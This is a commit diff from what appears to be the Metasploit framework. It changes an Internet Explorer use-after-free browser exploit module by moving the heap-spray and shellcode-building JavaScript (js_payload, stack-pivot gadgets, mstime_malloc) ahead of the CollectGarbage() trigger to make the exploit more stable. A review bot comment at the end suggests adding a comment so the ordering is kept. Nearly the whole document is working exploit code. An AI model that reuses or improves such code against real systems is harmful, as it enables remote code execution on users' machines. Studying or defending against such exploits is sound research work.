Land #1810, @wchen-r7's modification to make ie_cgenericelement_uaf m…
…ore stable
jvazquez-r7 committed May 9, 2013
2 parents f9f769c + 9043eed commit 94f841d
Showing 1 changed file with 16 additions and 16 deletions.
32 changes: 16 additions & 16 deletions modules/exploits/windows/browser/ie_cgenericelement_uaf.rb
Expand Up @@ -227,6 +227,22 @@ def load_exploit_html(my_target, cli)
function helloWorld()
{
sparkle = unescape("ABCD");
for (i=0; i < 2; i++) {
sparkle += unescape("ABCD");
}
sparkle += unescape("AB");
sparkle += unescape("#{js_payload}");
magenta = unescape("#{align_esp}");
for (i=0; i < 0x70/4; i++) {
if (i == 0x70/4-1) { magenta += unescape("#{xchg_esp}"); }
else { magenta += unescape("#{align_esp}"); }
}
magenta += sparkle;
f0 = document.createElement('span');
document.body.appendChild(f0);
f1 = document.createElement('span');
Expand All @@ -246,22 +262,6 @@ def load_exploit_html(my_target, cli)
f1.innerHTML = "";
CollectGarbage();
sparkle = unescape("ABCD");
for (i=0; i < 2; i++) {
sparkle += unescape("ABCD");
}
sparkle += unescape("AB");
sparkle += unescape("#{js_payload}");
magenta = unescape("#{align_esp}");
for (i=0; i < 0x70/4; i++) {
if (i == 0x70/4-1) { magenta += unescape("#{xchg_esp}"); }
else { magenta += unescape("#{align_esp}"); }
}
magenta += sparkle;
mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:"myanim"});
}
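Review bot: The block that builds `sparkle` and `magenta` now sits above the `createElement` calls, but nothing in the code records that its position relative to `f1.innerHTML = "";` and `CollectGarbage();` is deliberate, and the commit title says only "more stable". Because the reorder is the entire change, a later tidy-up could move the block back next to `mstime_malloc(...)` without any reviewer noticing the regression. A one-line comment above `sparkle = unescape("ABCD");` would pin it, for example `// Keep all string building above CollectGarbage(); ordering is intentional (see #1810)`. The enclosing `load_exploit_html` method and the middle of `helloWorld()` lie outside the visible hunks, so this is based only on the lines shown.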